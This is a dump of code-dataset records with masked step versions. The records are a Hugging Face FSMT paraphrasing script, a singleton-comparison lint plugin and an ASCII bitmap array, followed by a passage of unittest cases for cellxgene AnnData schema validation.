"step-4": "import sys\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\nimport logging\nlogging.disable(logging.INFO)\nfrom transformers.tokenization_fsmt import FSMTTokenizer\nfrom transformers.modeling_fsmt import FSMTForConditionalGeneration\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\ntext = (\n 'Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?'\n )\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nsys.path.insert(0, \"/code/huggingface/transformers-fair-wmt/src\")\n\nimport logging\nlogging.disable(logging.INFO) # disable INFO and DEBUG logger everywhere\n\nfrom transformers.tokenization_fsmt import FSMTTokenizer\nfrom transformers.modeling_fsmt import FSMTForConditionalGeneration\n\ndef translate(src, tgt, text):\n # to switch to local model\n #mname = \"/code/huggingface/transformers-fair-wmt/data/wmt19-{src}-{tgt}\"\n # s3 uploaded model\n mname = f\"stas/wmt19-{src}-{tgt}\"\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n\n encoded = tokenizer.encode(text, return_tensors='pt')\n # print(encoded)\n\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n # print(output)\n\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n #print(decoded)\n return decoded\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n#text = \"\"\"Here's a little song I wrote. You might want to sing it note for note. Don't worry, be happy. In every life we have some trouble. But when you worry you make it double. Don't worry, be happy. Don't worry, be happy now.\"\"\"\n\ntext = \"Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?\"\n\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\n# print together to avoid the logger noise :(\nprint(\"Paraphrasing:\")\nprint(f\"en : {text}\")\nprint(f\"en-ru-en: {en_ru}\")\nprint(f\"en-de-en: {en_de}\")\n\n# Paraphrasing:\n# en : Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?\n# en-ru-en: Every morning when I wake up, I have a delightful joy - the joy of being Salvador Dali - and I ask myself in delight: What wonderful things is this Salvador Dali going to do today?\n# en-de-en: Every morning when I wake up, I experience an extraordinary joy - the joy of being Salvador Dalí - and I wonder with delight: what wonderful things will this Salvador Dalí do today?\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import re
IS_WITH_SINGLETON_REGEX = re.compile(r"(!=|==)\s*(True|False|None)")
def check_is_with_singleton(physical_line, line_number):
match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)
if match_obj is not None:
offset = match_obj.span()[0]
return (0, 12, (line_number, offset), "Use equal with singleton")
plugins = {
"physical_line": [check_is_with_singleton],
"logical_line": [],
"ast": []
}
|
normal
|
{
"blob_id": "cf6d3a0fbf2a2daf8432622f780e138784ec505d",
"index": 8300,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\n<mask token>\n",
"step-3": "<mask token>\nIS_WITH_SINGLETON_REGEX = re.compile('(!=|==)\\\\s*(True|False|None)')\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\nplugins = {'physical_line': [check_is_with_singleton], 'logical_line': [],\n 'ast': []}\n",
"step-4": "import re\nIS_WITH_SINGLETON_REGEX = re.compile('(!=|==)\\\\s*(True|False|None)')\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\nplugins = {'physical_line': [check_is_with_singleton], 'logical_line': [],\n 'ast': []}\n",
"step-5": "import re\n\nIS_WITH_SINGLETON_REGEX = re.compile(\"(!=|==)\\s*(True|False|None)\")\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n\n if match_obj is not None:\n offset = match_obj.span()[0]\n return (0, 12, (line_number, offset), \"Use equal with singleton\")\n\nplugins = {\n \"physical_line\": [check_is_with_singleton],\n \"logical_line\": [],\n \"ast\": []\n}",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
ba0563.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
]
|
normal
|
{
"blob_id": "dab1adcd185092fc425b5d87150f27e7b67bff6c",
"index": 151,
"step-1": "<mask token>\n",
"step-2": "ba0563.pngMap = [\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000'\n ,\n 
'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000'\n ,\n 
'00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ]\n",
"step-3": "ba0563.pngMap = [\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000',\n'000000000000000000000000000000000000000000000000000000000000000000
00111111111111111111110000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import unittest
import numpy
import pandas as pd
import fixtures.examples_validate as examples
from cellxgene_schema.validate import Validator
from cellxgene_schema.write_labels import AnnDataLabelAppender
# Tests for schema compliance of an AnnData object
class TestValidAnndata(unittest.TestCase):
"""
Tests a valid AnnData object. Most other tests below modify this AnnData object and test for failure cases.
The valid AnnData object has all valid cases described in the schema.
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_valid_anndata(self):
self.validator.validate_adata()
self.assertFalse(self.validator.errors)
class TestH5adValidation(unittest.TestCase):
"""
    Checks that validation from h5ad works; only one invalid example is used here, as extensive testing is done in the
    classes below.
"""
def setUp(self):
self.h5ad_valid_file = examples.h5ad_valid
self.h5ad_invalid_file = examples.h5ad_invalid
self.validator = Validator()
def test_validate(self):
# Valid h5ad
self.assertTrue(self.validator.validate_adata(self.h5ad_valid_file))
# Invalid h5ads
self.assertFalse(self.validator.validate_adata(self.h5ad_invalid_file))
class TestExpressionMatrix(unittest.TestCase):
"""
Fail cases for expression matrices (anndata.X and anndata.raw.X)
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_shapes(self):
"""
All matrix layers MUST have the same shape, and have the same cell labels and gene labels.
"""
# Creates a raw layer
self.validator.adata.raw = self.validator.adata
self.validator.adata.raw.var.drop("feature_is_filtered", axis=1, inplace=True)
self.validator.adata.X = examples.adata_non_raw.X.copy()
self.validator.adata.uns["X_normalization"] = "CPM"
# remove one gene
self.validator.adata = self.validator.adata[:, 1:]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
["ERROR: Number of genes in X (3) is different than raw.X (4)."],
)
def test_sparsity(self):
"""
In any layer, if a matrix has 50% or more values that are zeros, it is STRONGLY RECOMMENDED that
the matrix be encoded as a scipy.sparse.csr_matrix
"""
self.validator.adata.X = self.validator.adata.X.toarray()
self.validator.validate_adata()
self.assertEqual(
self.validator.warnings,
[
"WARNING: Sparsity of 'X' is 0.875 which is greater than 0.5, "
"and it is not a 'scipy.sparse.csr_matrix'. It is "
"STRONGLY RECOMMENDED to use this type of matrix for "
"the given sparsity."
],
)
def test_raw_existence(self):
"""
Except for ATAC-seq and methylation data, raw data is REQUIRED
"""
# RNA - raw layer required
del self.validator.adata.raw
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Raw data is missing: there is no 'raw.X' and 'X_normalization' is not 'none'."
],
)
# ATAC - raw layer not required
# The assignment above makes X to not be raw: self.validator.adata.uns["X_normalization"] = "CPM"
# The following line makes it to be scATAC-seq data (EFO:0010891)
# Missing raw data in atac-seq data is allowed, thus the following should not return an error message
self.validator.errors = []
self.validator.adata.obs["assay_ontology_term_id"] = "EFO:0010891"
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
def test_final_strongly_recommended(self):
"""
Except for ATAC-seq and methylation data, final matrix is STRONGLY RECOMMENDED
"""
        # move raw to X, i.e. there is no final (normalized) layer
self.validator.adata.X = self.validator.adata.raw.X
del self.validator.adata.raw
self.validator.adata.uns["X_normalization"] = "none"
self.validator.validate_adata()
self.assertEqual(
self.validator.warnings,
[
"WARNING: Only raw data was found, i.e. there is no 'raw.X' and 'uns['X_normalization']' is 'none'. "
"It is STRONGLY RECOMMENDED that 'final' (normalized) data is provided."
],
)
class TestObs(unittest.TestCase):
"""
    Fail cases in adata.obs
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_column_presence(self):
"""
obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.
"""
columns = [
"assay_ontology_term_id",
"development_stage_ontology_term_id",
"disease_ontology_term_id",
"ethnicity_ontology_term_id",
"is_primary_data",
"sex_ontology_term_id",
"tissue_ontology_term_id",
]
for column in columns:
with self.subTest(column=column):
self.validator.errors = []
self.validator.adata = examples.adata.copy()
self.validator.adata.obs.drop(column, axis=1, inplace=True)
# Remove batch condition because it has a dependency with is_primary_data
self.validator.adata.uns.pop("batch_condition")
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[f"ERROR: Dataframe 'obs' is missing " f"column '{column}'."],
)
def test_column_presence_organism(self):
"""
obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.
        A separate check is needed for organism_ontology_term_id because removing it from anndata results in multiple
        errors, given that other columns depend on its presence.
"""
self.validator.adata.obs.drop("organism_ontology_term_id", axis=1, inplace=True)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Dataframe 'obs' is missing column "
"'organism_ontology_term_id'.",
"ERROR: Checking values with dependencies failed for "
"adata.obs['ethnicity_ontology_term_id'], this is likely due "
"to missing dependent column in adata.obs.",
"ERROR: Checking values with dependencies failed for "
"adata.obs['development_stage_ontology_term_id'], this is likely due "
"to missing dependent column in adata.obs.",
],
)
def test_obsolete_term_id(self):
"""
Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310
for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by
EFO:0009899 for 10x 3' v2.
https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310
"""
# Not a valid term
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0009310"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.",
"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id "
"of '[['EFO:0002772', 'EFO:0010183']]'.",
],
)
def test_assay_ontology_term_id(self):
"""
assay_ontology_term_id categorical with str categories.
